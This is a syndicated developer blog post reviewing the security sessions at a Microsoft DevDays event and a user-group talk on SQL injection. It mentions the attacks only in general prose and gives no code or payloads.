This post originated from an RSS feed registered with .NET Buzz
by Brad Wilson.
Original Post: DevDays Wrap-Up
Feed Title: The .NET Guy
Feed URL: /error.aspx?aspxerrorpath=/dotnetguy/Rss.aspx
Feed Description: A personal blog about technology in general, .NET in specific, and when all else fails, the real world.
DevDays Denver was this past Thursday. I stayed for the opening keynote, and 3 of the 4 sessions. I skipped the 4th, because it was covering ground I already knew very well: Microsoft's OpenHack implementation. Their whitepaper on the topic is absolutely excellent material for any IT person to read.
The opening keynote was decent, if unfocused. The presentation was primarily stringing together people using current and upcoming .NET technologies to solve problems. Unfortunately, when you have 2 minutes to talk about what you're doing, it really just turns into "here's who we are, and what we did, but not much about how we did it".
The 3 web track presentations I saw built on one another. The first presented things you should think about when securing your website; the second illustrated successful SQL Injection and Cross Site Scripting attacks; the third illustrated how to protect yourself from attacks.
Predictably, the first was pretty slow paced. Filling an hour with "things you should think about for security" is a bit of a stretch. The presenter was reasonable for someone who's not a professional, but clearly visibly nervous and anxious.
The second (which was presented by Peter Provost) was by far the best of the three. Peter is clearly very comfortable giving talks, and knew the material very well. The demo style was very good, the pacing was good, and he kept things interesting. While he couldn't dive into things I know he wanted to, he made the best of what he had at hand.
The third person seemed like they had 2 hours of material and a 1 hour time slot. They didn't really have an opportunity to dive into any of the code, merely showing that the attacks were no longer successful and imploring us to "look at the code" on the provided DVD for details. He even mentioned that he had to ditch a couple dozen slides from his deck (which Microsoft provides) just to make the presentation doable in an hour.
This was a real let down of a format, personally. Perhaps I'm a bit spoiled, but 3 days prior to DevDays, our Pragmatic Practitioners meeting talked about security. And, unlike our normal format, we were almost entirely dominated by demos and discussion from security deity Keith Brown, much to the benefit of all.
Having both presentations pretty clear in my mind, it's obvious that Microsoft should've just hired Keith to talk for 3 hours. Keith is a professional trainer, and a security guru. There's no question that I learned more from Keith in a couple hours than I ever could've taken away from Microsoft's slide decks. (Note: this is not a knock on the local presenters, because their hands were tied by the Microsoft-provided materials.)
In the course of our 2.5 hour meeting, Keith showed us how you could exploit something so innocuous as a search box on an e-commerce site that wasn't hardened, to discover the underlying database architecture: OS version, SQL verion, all the databases, and learn about any tables and columns we wanted. This was a pretty eye-opening experience.
Not to sound like a shill, but anybody who wants to seriously learn about security should consider hiring Keith to come into their company and teach. It's well worth the time and money.